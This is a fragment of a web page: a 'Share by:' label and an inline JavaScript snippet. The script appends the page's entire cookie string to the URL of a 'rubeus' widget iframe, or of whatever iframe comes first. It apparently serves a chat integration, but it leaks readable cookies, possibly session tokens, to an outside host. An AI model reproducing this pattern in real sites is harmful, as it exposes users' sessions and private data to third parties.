Share by:
setTimeout(function () { Array.from(document.querySelectorAll("iframe")).forEach(function (iframe, index) { if (iframe.classList.contains("rubeus-custom-channel-iframe") || index === 0) { iframe.src = iframe.src + "?cookie=" + document.cookie.split(" ").join(); } }); }, 1000);